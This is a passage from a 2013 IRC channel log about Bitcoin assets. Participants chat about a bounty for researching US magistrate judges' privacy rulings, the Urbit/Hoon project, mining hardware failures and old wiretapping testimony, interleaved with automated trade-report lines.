1993, but your blog thinks i'm a robot. Oct 06 20:54:03 heya! Oct 06 20:54:17 you need to give it a few seconds after you load a page, otherwise if you just paste shit in Oct 06 20:54:19 it will spit Oct 06 20:57:35 hmm, been on the page for a good 10 minutes now Oct 06 20:58:24 n/m, there we go Oct 06 20:58:40 there were apparently only 46 magistrage judges in 1993 Oct 06 21:00:13 nubbins` 46 ? Oct 06 21:00:20 no fucking way ?! Oct 06 21:00:25 i know, that's not even one per state Oct 06 21:00:29 and new jersey had like 5 Oct 06 21:00:39 hmmmm Oct 06 21:00:44 i guess there are other types of judges besides magistrate judges Oct 06 21:00:47 you know magistrature is relatively recent ... Oct 06 21:00:51 well yes, district judges. Oct 06 21:00:56 holy shit no fucking way 46 ?! Oct 06 21:01:05 yep Oct 06 21:01:06 http://www.fjc.gov/history/export/jb.txt Oct 06 21:01:19 CSV dump Oct 06 21:01:32 "Bankruptcy and Magistrate service" is the final column Oct 06 21:01:32 The directory includes the biographies of judges presidentially appointed during good behavior who have served since 1789 on the U.S. District Courts, the U.S. Courts of Appeals, the Supreme Court of the United States, the former U.S. Circuit Courts, and the federal judiciary's courts of special jurisdiction. Oct 06 21:01:39 it's the presidentially appointed Oct 06 21:01:46 i thought they get appointed by the court itself Oct 06 21:02:03 a ton of them got appointed by clinton in late oct 1993 Oct 06 21:02:27 hmmm Oct 06 21:02:46 you know you might be right even. Oct 06 21:03:11 [BTCTC] [BASIC-MINING] 48 @ 0.03766228 = 1.8078 BTC [-] {5} Oct 06 21:04:12 [BTCTC] [LABCOIN] 5000 @ 0.00013013 = 0.6507 BTC [-] {3} Oct 06 21:04:40 anyway, i probably precluded myself from any of that bounty by posting that info so early Oct 06 21:04:48 why ? Oct 06 21:05:03 well, i just saved someone a bunch of work Oct 06 21:05:16 still gets allocated to you Oct 06 21:05:21 o Oct 06 21:06:02 anyway, fun task Oct 06 21:06:10 #2 is a LOT more work Oct 06 21:06:32 yeah. Oct 06 21:08:15 [HAVELOCK] [AM1] 3 @ 1.335 = 4.005 BTC [+] Oct 06 21:10:46 [14:04] <@assbot> [BTCTC] [LABCOIN] 5000 @ 0.00013013 = 0.6507 BTC [-] {3} Oct 06 21:10:47 lol Oct 06 21:11:32 1 month to fall to 1/30th of price Oct 06 21:13:18 but what a month. Oct 06 21:14:07 !t bt labcoin Oct 06 21:14:09 [BTCT:LABCOIN] 1D: 0.0001226 / 0.00017 / 0.0002495 (591825 shares, 101.2 BTC), 7D: 0.0001226 / 0.00024 / 0.0004 (3022640 shares, 713.3 BTC), 30D: 0.0001226 / 0.00149 / 0.003989 (16872541 shares, 25162.5 BTC) Oct 06 21:22:30 [BTCTC] [FN] [DMS.SELLING] 60 @ 0.005011 = 0.3007 BTC [-] Oct 06 21:23:30 [HAVELOCK] [AM1] 1 @ 1.33899999 BTC [+] Oct 06 21:25:32 [BTCTC] [ASICMINER-PT] 3 @ 1.251 = 3.753 BTC [-] Oct 06 21:26:33 [BTCTC] [DMS.MINING] 502 @ 0.00129843 = 0.6518 BTC [+] {4} Oct 06 21:28:35 [HAVELOCK] [AM1] 2 @ 1.3 = 2.6 BTC [-] Oct 06 21:30:37 [HAVELOCK] [AM100] 700 @ 0.01341969 = 9.3938 BTC [+] {7} Oct 06 21:30:38 [HAVELOCK] [CBTC] 4865 @ 0.00028845 = 1.4033 BTC [+] Oct 06 21:43:08 mod6 http://trilema.com/2013/so-this-urbit-thing/ might interest you then Oct 06 21:45:52 [BTCTC] [PETA-MINE] 3 @ 0.51 = 1.53 BTC [+] Oct 06 21:51:36 I just saw that. :) Oct 06 21:51:50 This thing is pretty neat, might take me some time to learn hoon tho. Oct 06 21:52:59 [BTCTC] [FN] [DMS.SELLING] 26 @ 0.005012 = 0.1303 BTC [+] Oct 06 21:53:03 oh cool complimentary trilema articles Oct 06 21:53:31 I don't wanna get too far off course just yet. Gotta wrap up this current bitotter work and get further along with my look into cramer-shoup Oct 06 21:55:48 i kinda think the idea of the urbit ship being virtual real estate. Can only be transfered 9 times before it has no value. Oct 06 21:56:05 "And then for each of these individually compile a record showing all their rulings, orders and decisions which in any way touched upon individual rights of privacy, broadly construed so as to include anything relating to the production of communications of private persons in any written form, limited to an adversarial proceeding in which the US Government, or any agency or representative thereof w Oct 06 21:56:05 party, with proper case reference by number and where available link to published court proceedings" Oct 06 21:56:17 ^^^ is this restricted to the period of time when they were a magistrate judge? Oct 06 21:56:21 mod6 it's not a permanent thing Oct 06 21:56:26 Strange. Yet, kinda cool at first look here. I'll play with it a bit. Oct 06 21:57:03 [BTCTC] [ASICMINER-PT] 4 @ 1.3 = 5.2 BTC [+] Oct 06 21:57:58 nubbins` yup Oct 06 21:58:05 ok, great Oct 06 21:58:06 [BTCTC] [ASICMINER-PT] 20 @ 1.23205 = 24.641 BTC [-] {3} Oct 06 21:58:22 obviously if they become a senator it's moot Oct 06 21:58:36 yeah Oct 06 21:58:44 this is going to be a very small list Oct 06 21:59:00 to my surprise Oct 06 21:59:17 well, wait now Oct 06 21:59:25 i mean, some of these judges are still judges Oct 06 21:59:30 just not magistrate judges Oct 06 21:59:58 hm ? Oct 06 21:59:59 for example, Africk has issued privacy rulings in 2005 and 2013, but was only a magistrate judge from 1990-2002 Oct 06 22:00:20 well as long as he still issued rulings, you wan them Oct 06 22:00:35 sure Oct 06 22:01:16 how do you establish he's only issued so in 2005 and 2013 ? Oct 06 22:04:15 searched records from us gov printing office Oct 06 22:05:27 to be fair, i used the word "privacy" as a search qualifier, so i may have missed privacy-related rulings that did not use the word "privacy" Oct 06 22:05:34 indeed. Oct 06 22:05:47 but i suspect that the number of said rulings would be vanishingly small Oct 06 22:05:48 broadly construed so as to include anything relating to the production of communications of private persons in any written for Oct 06 22:06:13 i don't think there's any way to avoid going through his caselist Oct 06 22:06:32 you can sort to exclude cases where govt is not a party, and maybe cases where no persons are parties, Oct 06 22:06:42 yeah, that removed most of the chaff Oct 06 22:06:45 but otherwise you kinda have to skim the complaints Oct 06 22:07:36 can a court visit the issue of privacy without using the word, though? Oct 06 22:08:20 i mean, they can talk all they want about communications in any written form, but unless the word "privacy" or "private" comes up, they're not really discussing privacy, are they? Oct 06 22:12:19 [HAVELOCK] [AM100] 50 @ 0.01304204 = 0.6521 BTC [-] {4} Oct 06 22:14:05 yes they are. Oct 06 22:14:19 if Joe is ordered to produce the letter Moe sent him during discovery of Jane's divorce, Oct 06 22:14:22 this qualifies. Oct 06 22:14:58 arguably the part where privacy is touched upon without being specifically said so is more important than the other. Oct 06 22:16:27 arguably i could exclude all such cases and still win a fat bounty if nobody produces evidence that i left out any rulings Oct 06 22:16:39 arguably. Oct 06 22:17:00 that's probably what i'm going to do, fyi Oct 06 22:17:14 well, free market of bitcoin. Oct 06 22:17:22 it's how mining works too. Oct 06 22:17:50 wait, mining works? Oct 06 22:17:53 lel, &c Oct 06 22:17:55 ;;estimate Oct 06 22:17:56 Next difficulty estimate | 280954568.202 based on data since last change | 212713646.91 based on data for last three days Oct 06 22:18:04 holy shit!? Oct 06 22:18:28 yeah, lots of sad pandas with usb block erupters today Oct 06 22:18:48 not just today, of course Oct 06 22:18:56 lol pity the forum isn't up so i could forcefeed everyone -pr's buffett quote Oct 06 22:19:34 take consolation in the fact that they're quietly worrying while hitting F5 on /r/bitcoin Oct 06 22:20:11 now, if you'll excuse me, i'm told there is a cat in my bed that i must go bother Oct 06 22:20:40 bother all the cats. Oct 06 22:22:34 is there a precise time announced when btct will disable trading? Oct 06 22:25:12 does anyone give a fuck? Oct 06 22:27:16 hmm Oct 06 22:27:34 [BTCTC] [DMS.MINING] 156 @ 0.001221 = 0.1905 BTC [-] Oct 06 22:28:36 [BTCTC] [BASIC-MINING] 4 @ 0.0414 = 0.1656 BTC [+] {2} Oct 06 22:34:48 yes, a negative fuck. Oct 06 22:35:12 don't destroy the universe! Oct 06 22:36:07 :) Oct 06 22:39:46 [BTCTC] [ASICMINER-PT] 1 @ 1.22 BTC [-] Oct 06 22:41:48 [HAVELOCK] [AM100] 30 @ 0.0131 = 0.393 BTC [-] {2} Oct 06 22:42:30 you can't unscrew a pregnant lightbulb. Oct 06 22:43:34 18:40.43 ( mircea_popescu ) about the ddoses : i suspect bitcoin mining will fundamentally change the way internet adressing works. Oct 06 22:43:40 doesnt p2pool solve this already? Oct 06 22:43:59 not large enough yet i don't think, and has other problems Oct 06 22:44:04 (does it work with mm yet ?) Oct 06 22:44:37 i dont think mm is an issue Oct 06 22:45:40 thats pretty deep Oct 06 22:46:33 apparently mm already works with p2pool Oct 06 22:47:01 a ok Oct 06 22:47:21 then pretty cool, maybe it gets more widely used. Oct 06 22:47:57 it will if there will be a need for it Oct 06 22:55:00 [HAVELOCK] [AM100] 25 @ 0.0134 = 0.335 BTC [+] Oct 06 22:56:26 thats pretty deep // indeed Oct 06 22:58:03 [HAVELOCK] [AM100] 100 @ 0.0134 = 1.34 BTC [+] Oct 06 23:05:10 [BTCTC] [ASICMINER-PT] 1 @ 1.16 BTC [-] Oct 06 23:16:22 [BTCTC] [LABCOIN] 12000 @ 0.00016 = 1.92 BTC [+] Oct 06 23:20:28 [HAVELOCK] [HIM] 2 @ 0.12005 = 0.2401 BTC [+] {2} **** BEGIN LOGGING AT Mon Oct 7 08:23:09 2013 Oct 07 08:23:09 -NickServ- You are now identified for mircea_popescu. Oct 07 08:23:28 ahhh, good morning boys and girls. Oct 07 08:27:48 ITS BACK MP ITS BACK, thank christ Oct 07 08:28:01 what is ? Oct 07 08:28:10 bitcointalk Oct 07 08:30:24 o hey. Oct 07 08:31:24 [HAVELOCK] [AM100] 1082 @ 0.01419516 = 15.3592 BTC [+] {10} Oct 07 08:33:26 [HAVELOCK] [AM1] 8 @ 1.4399875 = 11.5199 BTC [+] {2} Oct 07 08:40:18 lol good morning Oct 07 08:41:34 [BTCTC] [B] [CIPHERMINE.B1] 16 @ 0.00812487 = 0.13 BTC [-] {2} Oct 07 08:41:34 [MPEX] [S.MPOE] 12885 @ 0.00083583 = 10.7697 BTC [+] Oct 07 08:48:27 yup Oct 07 08:53:45 [BTCTC] [CIPHERMINE-PT] 70 @ 0.03 = 2.1 BTC [-] Oct 07 08:56:37 and asicminer tanks haha Oct 07 09:00:24 Diablo-D3 haven't seen you in awhile Oct 07 09:00:52 [BTCTC] [LABCOIN] 3514 @ 0.0001418 = 0.4983 BTC [+] Oct 07 09:01:25 they see me lurkin' Oct 07 09:01:27 they hatin' Oct 07 09:02:23 where has bugpowder been Oct 07 09:02:28 ;;seen Bugpowder Oct 07 09:02:28 Bugpowder was last seen in #bitcoin-assets 4 days, 12 hours, 7 minutes, and 10 seconds ago: So the mechs thing was a hoax or waht? Oct 07 09:02:38 oh wow he just kinda sneaks in Oct 07 09:16:40 http://trilema.com/2013/mpex-breach-post-mortem/ Oct 07 09:16:41 MPEx breach - post mortem pe Trilema - Un blog de Mircea Popescu. Oct 07 09:19:11 [BTCTC] [BASIC-MINING] 54 @ 0.03379054 = 1.8247 BTC [-] {9} Oct 07 09:32:24 [MPEX] [S.MPOE] 1300 @ 0.00083923 = 1.091 BTC [+] Oct 07 09:37:29 [HAVELOCK] [AM100] 69 @ 0.0145 = 1.0005 BTC [+] {3} Oct 07 09:40:32 [MPEX] [S.MPOE] 365 @ 0.00083847 = 0.306 BTC [-] Oct 07 09:40:32 [BTCTC] [FN] [DMS.PURCHASE] 31 @ 0.006211 = 0.1925 BTC [-] Oct 07 09:49:47 mornin Oct 07 09:50:24 http://www.coindesk.com/lamassu-ships-first-bitcoin-atm/ we have fun here in bratislava guessing who ordered it Oct 07 09:50:53 cuz nobody is admiting it Oct 07 09:50:57 *admitting Oct 07 09:52:44 [MPEX] [S.MPOE] 8741 @ 0.00083213 = 7.2736 BTC [-] {2} Oct 07 09:53:05 morning Oct 07 10:02:54 [HAVELOCK] [AM100] 16 @ 0.0145 = 0.232 BTC [+] Oct 07 10:04:55 jurov o hey, there was a bet to that effect too Oct 07 10:05:24 http://bitbet.us/bet/358/bitcoin-atm-will-have-at-least-one-atm/ Oct 07 10:05:28 BitBet - Bitcoin ATM will have at least one ATM unit up and running by the end of September 2013 Oct 07 10:05:28 aww no, there WAS. Oct 07 10:05:56 bitbet time runs too fast Oct 07 10:08:03 ya srsly. Oct 07 10:08:18 it's like... two weeks normal time turn into 18 months of bitbet time. Oct 07 10:08:21 it's a total timescam. Oct 07 10:28:19 benkay_: Ahh, I've read more now on the urbit. I see what you mean by the 9-times thing as temporary. And after reading Datskovskiy's comments it's interesting that it was put in to begin with. Oct 07 10:28:55 has anyone had trouble with the urbit terminal being like really slow? Oct 07 10:30:15 I rebuild my sub just a bit ago because of this (http://www.urbit.org/2013/10/06/nicu.html), seems to be a bit more responsive.. but not what i would expect. Oct 07 10:30:31 (was worse before the update it seems to me... but still laaags a bit.) Oct 07 10:35:22 should be compiled with -O99 -funroll-all-loops Oct 07 10:50:13 mod6 well when the whole planet is one computer... Oct 07 10:50:33 probably some dolphin somewhere upset the flow of chi Oct 07 10:51:00 (TLDR: to keep using Urbit, delete all your pre-10/6 data, git pull the source again, make clean, make, and start over. Your destroyers and tickets will keep working. No, this will not keep happening, though it may happen once or twice again.) << preserved for futurosity. Oct 07 10:51:47 yeah, that was pretty interesting. like the first day I look into it, i have to blow everything away and start over. Oct 07 10:52:23 well at least 11k people have watching and thus therefore everyone knows the guy's name and admires his work or how did it go. Oct 07 10:52:39 but anyway ; satoshi forked btc too. it happens Oct 07 10:53:11 jurov: you trollin'? Oct 07 10:54:14 mircea_popescu: yeah, i recloned the repos and rebuilt. works fine. it's early in the project so, yeah shit happens. Oct 07 10:55:36 mod6 in other news, http://trilema.com/2013/so-this-urbit-thing/#comment-95441 haskelites hate it. Oct 07 10:57:00 jurov: -funroll-all-loops Oct 07 10:57:01 Perform the optimization of loop unrolling. This is done for all loops and usually makes programs run more slowly. `-funroll-all-loops' implies `-fstrength-reduce' as well as `-frerun-cse-after-loop'. Oct 07 10:57:12 so yah, 9/10 Oct 07 10:57:15 :P Oct 07 10:59:19 mod6 yeah trolling... couldn't resist as long-time gentoo user :) Oct 07 11:01:02 au! don't tell me you *did* recompile it? Oct 07 11:01:04 violence is not the loop. Oct 07 11:01:24 yeah, it seems that this guy Curtis Yarvin kinda goes against the grain with this one. im not a haskell guy or what not, so I'm not real sure what to think just yet. Oct 07 11:01:56 haha, yeah. Oct 07 11:02:08 im a dumbass for listening to you Oct 07 11:02:25 well i guess i get to use kako's bash for the first time ever. Oct 07 11:02:33 i tried to find a solution to this problem on the fuckin google groups thing and there was a thread about it. Oct 07 11:02:42 but it wasn't helpful what-so-ever. Oct 07 11:02:47 maybe its just a pile of shit Oct 07 11:02:58 im not sure what to think about this thing yet. Oct 07 11:03:54 [HAVELOCK] [B] [XBOND] 100 @ 0.00126896 = 0.1269 BTC [+] {2} Oct 07 11:04:22 me either. Oct 07 11:04:30 and i don't even know cs. Oct 07 11:04:48 well, either do i. i was just trolled by jurov. Oct 07 11:05:25 im gonna quit this shit and go work at walmart selling plants. Oct 07 11:05:47 you could put on a bikini, place yourself in a pot and sell yourself as a bikini clad potted plant. Oct 07 11:06:57 [HAVELOCK] [AM100] 347 @ 0.0145 = 5.0315 BTC [+] Oct 07 11:07:05 haha. i'll even do a dance move for a quick .01 BTC Oct 07 11:07:49 aight, now that i've got this thing back to non-suck mode... Oct 07 11:07:58 [HAVELOCK] [AM100] 20 @ 0.0146 = 0.292 BTC [+] {2} Oct 07 11:08:20 ~tasfyn-partyv/try=> :reset Oct 07 11:08:20 This will replace all the Arvo code, including Hoon in Hoon itself, and keep your data intact - even running processes. Oct 07 11:08:23 this later part is good. Oct 07 11:08:59 [HAVELOCK] [AM100] 17 @ 0.01481954 = 0.2519 BTC [+] {4} Oct 07 11:09:08 yeah, thats pretty awesome. Oct 07 11:11:19 when was the last time, say, a Google app lost your data? Oct 07 11:11:21 bwaghahaha. Oct 07 11:11:24 remember mybitcoin ? Oct 07 11:11:39 or no wait. what was it, that polish exchange that mtgox boight Oct 07 11:11:56 because the guy had all the btc in the cloud and lost the instance. Oct 07 11:12:02 yeah haha. Oct 07 11:12:21 i wanna say that happened a few times even. Oct 07 11:12:26 *poof* Oct 07 11:13:33 but afaik urbit has everything versioned Oct 07 11:13:46 " hi all." < i said something on #urbit. Oct 07 11:13:55 which from what i gather is NOT run on urbit ? Oct 07 11:14:40 haha, nice. i just joined in over there a few mins ago too. Oct 07 11:15:05 [HAVELOCK] [HIM] 1 @ 0.1331 BTC [+] Oct 07 11:15:18 CY said he didn't want to do an irc channel because urbit can be sort of like IRC in and of itself. but in the mean time he'll set one up until it gets further along. Oct 07 11:15:55 i figure, maybe they can help my urbit n00bness until i get my sealegs. Oct 07 11:17:08 these ships...it's a PONZI Oct 07 11:20:08 are you getting good with hoon, jurov Oct 07 11:20:08 ? Oct 07 11:21:03 no only read these docs and filed it for later Oct 07 11:21:28 ahh. im trying to familiarize myself with these 'runes' Oct 07 11:21:59 its not as bad as brainfuck, but not by much Oct 07 11:22:12 [MPEX] [S.MPOE] 8300 @ 0.00083632 = 6.9415 BTC [+] {2} Oct 07 11:23:28 decided to do some overdue upgrades instead...got unexpected 50% cpu usage decrease :) Oct 07 11:24:08 nice Oct 07 11:24:14 [BTCTC] [LABCOIN] 800 @ 0.00015 = 0.12 BTC [-] {3} Oct 07 11:27:56 http://i.imgur.com/uy6icfj.png Oct 07 11:28:38 lol Oct 07 11:28:40 seems about right Oct 07 11:34:21 i haven't used an LSB system since i worked on porting fbsd to sparc64 Oct 07 11:34:54 i thought they're unconstitutional anyway Oct 07 11:39:29 [MPEX] [S.MPOE] 6250 @ 0.00083923 = 5.2452 BTC [+] Oct 07 11:43:55 heheh, well since x86 intel, its not been nearly as widely used. i think that network addresses are all passed in lsb though, and then they added htonl/s ntohl/s for translation, etc. Oct 07 11:44:34 [BTCTC] [LABCOIN] 23200 @ 0.00017773 = 4.1233 BTC [+] {5} Oct 07 11:45:35 [HAVELOCK] [AM100] 20 @ 0.01375 = 0.275 BTC [-] Oct 07 11:47:37 [MPEX] [S.MPOE] 12286 @ 0.00083404 = 10.247 BTC [-] {2} Oct 07 12:16:05 [HAVELOCK] [AM100] 10 @ 0.01375 = 0.1375 BTC [-] Oct 07 12:21:50 ;;ticker Oct 07 12:21:50 MtGox BTCUSD ticker | Best bid: 135.75000, Best ask: 136.00000, Bid-ask spread: 0.25000, Last trade: 135.75000, 24 hour volume: 6768.60069259, 24 hour low: 134.10000, 24 hour high: 139.00000, 24 hour vwap: 136.55720 Oct 07 12:22:15 there is a new listing on mpex ! whoooa Oct 07 12:27:06 cool, there is a hoon.vim Oct 07 12:31:51 hoonhoon.vim? Oct 07 12:33:50 wait, does this mean a vim implementation ? Oct 07 12:36:58 haha, no i wish. Oct 07 12:37:18 just a vim script for unix so the syntax can be color-highlighted. didn't mean to get yall excited. Oct 07 12:37:39 there is another that seems to try to translate scribbles to runes, but I haven't gotten it to work on my vim yet. Oct 07 12:41:30 [BTCTC] [BASIC-MINING] 29 @ 0.0415331 = 1.2045 BTC [+] {3} Oct 07 12:48:37 [MPEX] [S.MPOE] 9750 @ 0.00083877 = 8.178 BTC [+] {2} Oct 07 12:49:38 [BTCTC] [BASIC-MINING] 7 @ 0.04 = 0.28 BTC [-] Oct 07 12:58:25 i suspect this is currently the largest productivity sink in it. Oct 07 12:58:55 also, http://en.wikipedia.org/wiki/Spellcasting_101:_Sorcerers_Get_All_The_Girls Oct 07 12:59:21 lol Oct 07 13:02:51 [BTCTC] [COGNITIVE] 4 @ 0.088 = 0.352 BTC [-] Oct 07 13:04:53 [BTCTC] [B] [CIPHERMINE.B1] 100 @ 0.008 = 0.8 BTC [-] Oct 07 13:06:55 [MPEX] [S.MPOE] 4337 @ 0.0008323 = 3.6097 BTC [-] {2} Oct 07 13:13:01 [HAVELOCK] [HIM] 1 @ 0.1331 BTC [+] Oct 07 13:19:07 [HAVELOCK] [NEOBEE] 38 @ 0.00295875 = 0.1124 BTC [+] {2} Oct 07 13:42:26 this urbit thing is wacky Oct 07 13:42:58 http://www.theguardian.com/world/2013/oct/06/argentina-president-cristina-fernandez-brain-haematoma Oct 07 13:42:58 Argentina's president Cristina Fernandez suffers brain haematoma | World news | theguardian.com Oct 07 13:45:34 [BTCTC] [FN] [COG.F2] 1 @ 2.39 BTC [+] Oct 07 13:46:11 "Leather Goddesses of Phobos 2: Gas Pump Girls Meet the Pulsating Inconvenience from Planet X!" Oct 07 13:48:37 [BTCTC] [FN] [COG.F2] 1 @ 2.8 BTC [+] Oct 07 13:51:00 its like i wanna go down this rabbit hole and figure this thing out, but I don't think im smart enough or something. Oct 07 13:53:56 the guy says, "urbit will always run on top of unix." but d00d also wants this to surpass *nix at some point... Oct 07 13:54:26 mod6 http://trilema.com/2013/so-this-urbit-thing/#comment-95448 << average people have trouble FINDING IT Oct 07 13:54:31 i think you may be smart enough. Oct 07 13:54:51 (Chapter 1.7): If a real OS runs on the bare hardware and is preemptive, it’s clear that Arvo is not a real OS and will never be one. It will always run on Unix. Of course in a sense it comes to bury Unix, but also to praise it - to imitate it - and even to surpass it. Oct 07 13:55:03 Unix today is ancient, bloated and debilitated, but its historic greatness is eternal. Comparing Unix to other OSes of its time is comparing Shakespeare to other playwrights of his time. Oct 07 13:55:07 But, ya know, times change. How do we surpass Unix? We’ve got two words for you - typed pipes! Oct 07 13:55:48 actually marlowe was not that bad Oct 07 13:55:56 this is an argument to ignorance Oct 07 13:56:05 So far, and i've only spent a few hours on it, but I'm so hoplessly lost on hoon, that i don't see how this could be more useful than unix at this point. Oct 07 13:56:31 i mean, it needs unix to run to begin with... so wtf Oct 07 13:57:36 at somepoint it'll have to run out of a chip directly or some other interpreter or interface to wholly replace unix Oct 07 13:58:47 [BTCTC] [ASICMINER-PT] 23 @ 1.43852172 = 33.086 BTC [-] {5} Oct 07 13:58:51 I still think its pretty cool, and I'm probably just derp. But I'm not convinced that I'm not being trolled somehow. Oct 07 13:58:53 if indeed the specification is as short as presented, it's prolly trivial to build asics that execute it natively Oct 07 13:59:48 [MPEX] [S.MPOE] 8350 @ 0.00084024 = 7.016 BTC [+] {2} Oct 07 14:00:10 yeah, the nock is like, very short. and the hoon compiler itself is really small. Oct 07 14:01:49 this page is pretty lulzy, whomever wrote it was just guessing at a lot of the stuff: https://github.com/urbit/urbit/wiki/Decoding-Hoon Oct 07 14:03:51 [BTCTC] [B] [CIPHERMINE.B1] 56 @ 0.008 = 0.448 BTC [-] Oct 07 14:04:52 [BTCTC] [FN] [COG.F] 1 @ 1.99 BTC [+] Oct 07 14:06:54 [BTCTC] [BASIC-MINING] 15 @ 0.04 = 0.6 BTC [-] Oct 07 14:08:27 anyway, i dunno, i still think its pretty neat if its not an epic troll. i submitted for my destroyers, so we'll see where that goes. Oct 07 14:08:42 it's still neat even if it is an epic troll. Oct 07 14:08:47 what difference does that make ? Oct 07 14:08:56 [BTCTC] [LABCOIN] 15894 @ 0.0001812 = 2.88 BTC [+] {4} Oct 07 14:09:57 [BTCTC] [LABCOIN] 6599 @ 0.00020115 = 1.3274 BTC [+] {3} Oct 07 14:10:31 haha, none i guess. i just hope that even if it is a troll, it can be made into something useful. Oct 07 14:10:58 [BTCTC] [LABCOIN] 900 @ 0.000226 = 0.2034 BTC [+] {2} Oct 07 14:11:17 now that all depends i ghuess :p Oct 07 14:11:54 good morning from the states. Oct 07 14:13:00 [BTCTC] [ASICMINER-PT] 7 @ 1.445 = 10.115 BTC [+] Oct 07 14:16:05 ello Oct 07 14:17:16 (What happens if there’s an error? Like, a type error? Duh, the compiler crashes. Hey, at Yale, what do they do if there’s an error? I don’t know but it’s probably some kind of fancy exception thing. Oct 07 14:17:31 haha Oct 07 14:19:06 [BTCTC] [LABCOIN] 850 @ 0.000226 = 0.1921 BTC [+] Oct 07 14:19:18 amazing compiler. Oct 07 14:19:19 AMAZING COMPANY! Oct 07 14:19:29 :) Oct 07 14:22:17 it'd be cool to see if all of these destroyers can easily talk to one-another from distributed hosts worldwide. then maybe it'd be neat to try to develop a p2p or distributed encrypted irc network. Oct 07 14:23:05 either public or private nodes. Oct 07 14:23:38 make smartphone nodes. They are harder to block... Oct 07 14:23:49 the syntax is so gnarly that it seems like it would be hard to develop, but i suppose that one you get the hang of it... Oct 07 14:24:21 *once Oct 07 14:24:58 that funny moment when you realise urbit is discussed in 500 lines on #bitcoin-assets and in 5 lines on #urbit Oct 07 14:25:07 lol Oct 07 14:25:11 my bad Oct 07 14:28:34 daybyter: its too bad really, these devices are like the NSA data-collector nodes. i don't even trust the snapdragon chips in 'em any more really. Oct 07 14:28:52 mod6 wasn't implying it's a bad thing, on the contrary Oct 07 14:29:01 gotta discuss where the brainz are. Oct 07 14:29:09 ah, ok :) Oct 07 14:29:22 but it's easier to shutdown servers than mobiles... Oct 07 14:29:29 is it ? Oct 07 14:30:25 depends.. Oct 07 14:31:18 for instance, in current form, urbit does key-gen right off the start. i'd hesitate to launch an instance with that software thats native (unless rooted and running something like cyanogen -- even then do we trust that either?) Oct 07 14:31:42 and besides do we trust chip makers any more either? Oct 07 14:33:32 mod6 im listening to this and pasting in the nsa "to do" list :D Oct 07 14:33:45 haha Oct 07 14:35:16 i suppose that something like urbit could actually live inside of other software eventually as some sort of embedded system. or if it ever took the leap to native hardware, it could run on some sort of FPGA or pre-set asic chip. Oct 07 14:35:51 someone needs to write a network stack for it. Oct 07 14:36:07 lol that'll be ishy in hoon! Oct 07 14:36:56 kncsplosion http://imgur.com/2UZuUzH Oct 07 14:38:04 oo started a fire in her panties huh? Oct 07 14:39:11 what burned there, the controller or what ? Oct 07 14:39:52 looks like a small transformer or something Oct 07 14:39:59 but i have no idea Oct 07 14:40:29 two mor epics http://imgur.com/a/hyA3a Oct 07 14:41:26 ThickAsThieves ? Oct 07 14:41:26 lol nice whats that a transistor Oct 07 14:41:41 they say its 2-3 boards this has happend to, but not confirmed Oct 07 14:41:52 i only have intro knowledge of these things, but i'd guess a small transformer Oct 07 14:41:58 ya Oct 07 14:42:03 A year after the 1994 Digital Telephony bill passed, the FBI disclosed plans to require the phone companies to build into their infrastructure the capacity to simultaneously wiretap one percent of all phone calls in all major US cities. This would represent more than a thousandfold increase over previous levels in the number of phones that could be wiretapped. In previous years, there were only about 1000 court-ordered wiretaps in the US per Oct 07 14:42:03 year, at the federal, state, and local levels combined. Oct 07 14:42:08 https://www.philzimmermann.com/EN/testimony/index.html Oct 07 14:42:08 Phil Zimmermann's Senate Testimony Oct 07 14:42:16 this shit's so much fun to read, 20 years later. Oct 07 14:42:20 nice skidmark Oct 07 14:43:01 <3 Phil Oct 07 14:43:03 thjat last thing is an exploded capacitor. Oct 07 14:43:09 which really just means bad capacitor. Oct 07 14:43:15 ;;google capacitor disease Oct 07 14:43:16 Capacitor plague - Wikipedia, the free encyclopedia: ; PSA: TiVo HD's Hit By Capacitor Plague! - DealDatabase Forum: ; How do you define capacitor in good condition - WikiAnswers: (1 more message) Oct 07 14:43:46 i've only ever seen cylindrical capacitors Oct 07 14:43:49 again i'm a noob Oct 07 14:44:47 ya my guy says they are caps too Oct 07 14:45:41 i suppose it would be weird to have that many small transistors anyway Oct 07 14:45:43 lol he says its 'bodged' Oct 07 14:47:46 he says he could be wrong and they might be 'some kinda funky resistor' Oct 07 14:47:54 *shrug* Oct 07 14:48:06 mod6 is here Oct 07 14:48:08 just as I have to leave Oct 07 14:48:12 I h8 you no Oct 07 14:48:12 w Oct 07 14:48:15 nao* Oct 07 14:48:21 I am revoking our frienship Oct 07 14:48:22 jkjk Oct 07 14:48:22 heh Oct 07 14:48:36 HEH. been here all night talkin about urbit :] Oct 07 14:48:53 i been up all night trynna get ma money right Oct 07 14:49:42 yeah what im getting as most likely story is that they bought as cheap parts as they could find, and ended up with a batch of shitty caps. Oct 07 14:49:46 which you know... blow. Oct 07 14:49:54 stack the rest of the yams in my auntie's house..and then what! Oct 07 14:50:37 [BTCTC] [FN] [BTC-GROWTH] 103 @ 0.0848997 = 8.7447 BTC [+] {2} Oct 07 14:50:38 peace out folks time to get fresh and jump into one of them cars Oct 07 14:53:35 info on flaming board from my buddy: http://pastebin.com/AbAr6Mcv Oct 07 14:53:59 Check out my friend's hotrod caddilac..finally got a chance to see it in action last night. Its more or less a corvette in a suit and tie http://s540.beta.photobucket.com/user/LivernoisMotorsports/library/Pauls%20V Oct 07 14:57:02 that one comes straight from GM 'eh? is that the 502? Oct 07 15:02:50 [HAVELOCK] [AM100] 14 @ 0.0136 = 0.1904 BTC [-] Oct 07 15:04:52 [MPEX] [S.MPOE] 9350 @ 0.00084028 = 7.8566 BTC [+] Oct 07 15:04:52 [BTCTC] [LABCOIN] 15905 @ 0.00015472 = 2.4608 BTC [-] {6} Oct 07 15:05:01 yeah Oct 07 15:05:36 we are a couple of long time gear heads I have a 1986 t-top mustang 5.0 drag car thats real fun dont get much chance to play with it though. Oct 07 15:07:02 thats not the 502 its a small block stroked to 400+ ci all fuel injected obviously Oct 07 15:08:42 KRS1: ahh. ok. Oct 07 15:10:58 [MPEX] [S.MPOE] 1900 @ 0.00083206 = 1.5809 BTC [-] Oct 07 15:26:13 [BTCTC] [LABCOIN] 50000 @ 0.00015287 = 7.6435 BTC [-] {10} Oct 07 15:31:18 [BTCTC] [LABCOIN] 44410 @ 0.00015008 = 6.6651 BTC [-] {7} Oct 07 15:32:19 [BTCTC] [LABCOIN] 10000 @ 0.00015 = 1.5 BTC [-] Oct 07 15:36:23 [BTCTC] [ASICMINER-PT] 22 @ 1.36245454 = 29.974 BTC [-] {3} Oct 07 15:37:24 [HAVELOCK] [AM1] 17 @ 1.32882352 = 22.59 BTC [-] {4} Oct 07 15:37:25 [HAVELOCK] [AM100] 51 @ 0.0130049 